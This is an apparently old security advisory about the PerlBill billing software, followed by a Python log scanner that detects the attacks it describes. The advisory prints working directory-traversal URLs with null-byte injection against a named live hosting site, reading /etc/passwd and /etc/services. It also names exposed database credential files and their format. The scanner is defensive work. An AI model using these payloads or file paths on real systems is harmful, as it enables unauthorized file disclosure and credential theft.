I was doing a small security audit on a friend's hosting website and noticed he was using PerlBill.
Stated on PerlBill.com, "PerlBill is a client management solution for companies selling on the Internet.
Using PerlBill you can manage orders, clients and client support efficiently. Our demonstration above will
give you a full overview of PerlBill features and possibilities."
As I was doing the audit, I noticed various directories had been left un-indexed; apparently not everything
had been uploaded properly. I took notice of various CGI scripts and attempted to exploit them using
directory traversal attacks and to make the scripts execute commands remotely. I have found some scripts
that are slightly vulnerable to directory traversal attacks, but it is minor. I cannot really tell what is
going on in the code, because I do not have the source. Here are the results of some traversals:
http://optixhosting.com/order/cgi-bin/kb.cgi?lang=../../../../../../../../../../etc/passwd%00
http://optixhosting.com/order/cgi-bin/client.cgi?lang=../../../../../../../../../../../etc/services%00&do=register
http://optixhosting.com/order/cgi-bin/client.cgi?do=pro_login&lang=../../../../../../../../../../../etc/services%00&password=1&username=1
PerlBill Error: syntax error at include/lang/../../../../../../../../../../etc/passwd line 1, near "root:x:"
Compilation failed in require at kb.cgi line 52.
PerlBill: Script Error
Perlbill was unable to launch due to the following errors:
syntax error at include/lang/../../../../../../../../../../../etc/services line 22, near "tcpmux 1"
Compilation failed in require at client.cgi line 67.
Apparently these are very minor, because the error message only shows a fragment rather than the full
contents of the /etc/services and /etc/passwd files. I'm sure there are many variations of the traversal,
or even more in-depth attacks, for obtaining the full contents of the files. As I said before, I haven't
had a chance to view the source, since you need to pay for the entire package.
Last but not least, as I was looking through the directories, I also noticed that there are two *.db files
containing logins with the encrypted password. I'm not sure what algorithm they use; for all I know it could
be unencrypted, or maybe he just has a hard password. Here are those two files:
http://[site]/include/lib/dbaccess.db
http://[site]/include/lib/dbpass.db
dbaccess.db will contain the following in this format:
[hostname]|[sql database name]|[sql database login]|[database password]
dbpass.db is different from that one; I believe it only contains the password line, and it is encrypted.
When I looked at it, it was weird characters in a weird order, for example:
&ะท# e
This could possibly be the password encrypted with some cheap algorithm; I have no idea. This advisory is
just an observation.
Thanks for reading.
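As an added example (not part of the advisory, and not PerlBill code), a small Python log scanner that flags the two request patterns described above in Apache access-log lines: traversal sequences or a %00 byte in the lang parameter of the CGI scripts, and direct fetches of include/lib/*.db. The log lines, hostnames and client addresses are constructed for the example, not captured traffic.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed Apache combined-log sample shaped like the requests in the advisory.
# Client addresses are documentation ranges, not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2004:12:00:01 +0000] "GET /order/cgi-bin/kb.cgi?lang=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 500 512
203.0.113.7 - - [10/Jan/2004:12:00:05 +0000] "GET /order/cgi-bin/client.cgi?do=pro_login&lang=..%2F..%2F..%2Fetc%2Fservices%00&password=1&username=1 HTTP/1.0" 500 640
198.51.100.3 - - [10/Jan/2004:12:01:10 +0000] "GET /order/cgi-bin/client.cgi?lang=en&do=register HTTP/1.0" 200 2048
203.0.113.7 - - [10/Jan/2004:12:02:00 +0000] "GET /order/include/lib/dbaccess.db HTTP/1.0" 200 91
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$')
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')   # a "../" or "..\" path segment
DB_RE = re.compile(r'/include/lib/[^/?]+\.db$')        # the credential files named in the advisory

def inspect_request(target):
    """Return the reasons a request target looks like PerlBill traversal or .db disclosure (empty if clean)."""
    reasons = []
    parts = urlsplit(target)
    path = unquote(parts.path)
    if DB_RE.search(path):
        reasons.append("direct fetch of credential store " + path)
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl already percent-decodes once; a second pass also catches %2500-style double encoding
        decoded = unquote(value)
        if "\x00" in decoded:
            reasons.append(f"NUL byte in parameter {name!r}")
        if TRAVERSAL_RE.search(decoded):
            reasons.append(f"directory traversal in parameter {name!r}: {decoded!r}")
    return reasons

def scan_log(text):
    """Return (client, target, reasons) for every log line that triggers a finding."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue   # skip lines that are not in combined-log format
        reasons = inspect_request(m.group("target"))
        if reasons:
            findings.append((m.group("ip"), m.group("target"), reasons))
    return findings

if __name__ == "__main__":
    for ip, target, reasons in scan_log(SAMPLE_LOG):
        print(ip, target, "; ".join(reasons))
```

On the sample the scanner reports the two traversal requests and the dbaccess.db fetch, and passes the legitimate lang=en request.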
=================================
by atomix
atomix[at]seljak[dot]org
atomix[at]hush[dot]ai
atomix[at]nix[dot]org
greets: !tc crew, !sh crew @efnet, #nixsec@undernet, #darknet@efnet.